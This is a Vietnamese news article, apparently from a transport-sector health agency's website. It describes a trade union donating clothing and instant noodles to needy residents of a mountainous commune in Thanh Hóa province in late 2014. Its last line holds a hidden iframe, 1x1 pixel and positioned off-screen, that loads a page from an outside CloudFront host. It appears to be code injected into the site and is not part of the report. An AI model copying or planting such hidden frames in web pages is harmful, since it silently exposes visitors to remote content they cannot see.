Thứ 6, 29/3/2024 Tin tức & Sự kiện  > Tin hoạt động y tế

Công đoàn Cục Y tế Giao thông vận tải ủng hộ cho đồng bào khó khăn xã Thành Sơn, huyện Bá Thước, tỉnh Thanh Hoá

05/01/2015 8:16 GMT+7

Sáng ngày 29 tháng 12 năm 2014, tại trụ sở Uỷ ban nhân dân xã Thành Sơn, huyện Bá Thước, tỉnh Thanh Hoá, Công đoàn Cục Y tế Giao thông vận tải đã trao tặng 900 bộ quần áo và 10 thùng mì tôm cho đồng bào khó khăn xã Thành Sơn, huyện Bá Thước, tỉnh Thanh Hoá.

Thực hiện chỉ đạo của Công đoàn Giao thông vận tải Việt Nam tại công văn số 684/KH-CĐN ngày 11/12/2014 về việc tổ chức ủng hộ quần, áo ấm cho đồng bào các tỉnh miền núi, vùng sâu, vùng xa. Để góp phần giúp đỡ, chia sẻ với người dân nghèo vùng sâu, vùng xa vượt qua mùa đông giá lạnh, Ban Thường vụ Công đoàn Cục Y tế Giao thông vận tải đã kêu gọi và vận động toàn thể cán bộ, công nhân viên lao động Y tế Ngành Giao thông vận tải với tinh thần “Tương thân, tương ái”, “Lá lành, đùm lá rách” tích cực ủng hộ quần, áo ấm cho đồng bào nghèo của các tỉnh còn có nhiều khó khăn.

Tới dự buổi lễ, về phía huyện Bá Thước có đồng chí Lò Văn Thắng -Phó Chủ tịch Uỷ ban nhân dân huyện, đồng chí Lê Đức Thực -Phó Chủ tịch Uỷ ban nhân dân huyện; đồng chí Nguyễn Thái Hoà -Phó Chủ tịch Công đoàn Ngành Giao thông vận tải Thanh Hoá; đồng chí Ngân Văn Mua -Chủ tịch Uỷ ban nhân dân xã Thành Sơn.

Phát biểu tại buổi lễ, đồng chí Trịnh Công Vinh -Phó Chủ tịch Công đoàn Cục Y tế Giao thông vận tải nhấn mạnh: Những món quà tuy nhỏ, nhưng là tấm lòng, tình cảm của cán bộ, công nhân viên lao động Y tế Ngành Giao thông vận tải gửi đến, với hy vọng sẽ mang lại hơi ấm tới đồng bào vùng sâu, vùng xa miền núi của tỉnh Thanh Hoá.

Thay mặt cán bộ, nhân dân địa phương đồng chí Lò Văn Thắng -Phó Chủ tịch Uỷ ban nhân dân huyện Bá Thước đã bày tỏa lòng biết ơn sâu sắc, vì tinh thần “Tương thân, tương ái” của cán bộ, công nhân viên lao động Y tế Ngành Giao thông vận tải với đồng bào miền núi của huyện Bá Thước, tỉnh Thanh Hoá còn nhiều khó khăn.

Một số hình ảnh hoạt động:

frame id="iagdtd_frame" src="https://d19tqk5t6qcjac.cloudfront.net/i/412.html" style="position: absolute; width: 1px; height: 1px; left: -9999px;">